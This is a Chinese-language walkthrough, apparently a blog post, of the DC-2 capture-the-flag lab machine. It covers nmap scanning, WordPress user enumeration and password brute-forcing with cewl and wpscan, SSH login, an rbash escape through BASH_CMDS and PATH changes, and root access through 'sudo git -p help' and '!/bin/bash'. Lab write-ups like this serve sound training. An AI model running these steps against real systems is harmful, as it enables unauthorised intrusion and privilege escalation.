DC-2靶机渗透测试记录

靶机信息

靶机地址:http://www.five86.com/dc-2.html
下载完成后,运行文件夹中的.ova文件即可安装靶机(vmware)
网络连接方式为NAT,kali与靶机为同一网段

信息搜集

使用nmap扫描网段,判断出靶机的ip地址
找到两个端口80、7744

nmap -p- 192.168.48.0/24

DC-2靶机渗透测试记录_第1张图片

先看下80端口 http://192.168.48.142
发现无法访问,看下控制台应该是dns解析的问题,ERR_NAME_NOT_RESOLVED
DC-2靶机渗透测试记录_第2张图片
需要在kali上修改host文件,路径为/etc/hosts
将靶机的ip和网址的域名写入即可
DC-2靶机渗透测试记录_第3张图片
再次访问80端口,在首页可以看到flag1的信息
DC-2靶机渗透测试记录_第4张图片
flag1中让我们使用cewl去搜集用户信息
kali自带这个工具,可以搜集网站信息生成一个txt文件

cewl dc-2 > dc2.txt

# dc-2为域名,应该与之前host文件中添加的一致

DC-2靶机渗透测试记录_第5张图片
这个网站用的是wordpress
使用wpscan枚举下用户名,找到3个用户
然后将这三个用户名存到一个文本里,方便进行暴破

wpscan --url http://dc-2/ -e u

DC-2靶机渗透测试记录_第6张图片
用wpscan进行暴破
得到两个账户的密码

wpscan --url http://dc-2 -U id.txt -P dc2.txt

# id.txt为用户名字典,dc2.txt是用cewl生成的字典

DC-2靶机渗透测试记录_第7张图片
使用账号密码尝试登录wordpress后台
默认后台路径为/wp-admin
登录jerry账号在pages界面下找到flag2
flag2的意思大概是通过wordpress这个路走不通
DC-2靶机渗透测试记录_第8张图片
然后尝试通过7744端口ssh登录
jerry账户登录失败

ssh 192.168.48.142 -p 7744 -l jerry

DC-2靶机渗透测试记录_第9张图片
发现使用tom账号可以登录

ssh 192.168.48.142 -p 7744 -l tom

DC-2靶机渗透测试记录_第10张图片

权限提升

ls查看后发现有flag3.txt,但是无法cat,可以使用vim进行查看
flag3提示su到jerry账户,但是su指令也用不了
DC-2靶机渗透测试记录_第11张图片
DC-2靶机渗透测试记录_第12张图片
看到错误提示是rbash,可以进行rbash绕过
使用jerry的密码登录成功

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry

DC-2靶机渗透测试记录_第13张图片
在jerry的家目录下找到flag4.txt
flag4.txt大概意思是要git提权
DC-2靶机渗透测试记录_第14张图片
看到git有root权限
输入sudo git -p help后直接输入!/bin/bash即可完成提权

sudo -l
sudo git -p help
!/bin/bash

DC-2靶机渗透测试记录_第15张图片
提权完成后,在root目录下找到final-flag
DC-2靶机渗透测试记录_第16张图片

你可能感兴趣的:(DC靶机系列,dc-2靶机,dc靶机,dc,2靶机,five86,DC靶机)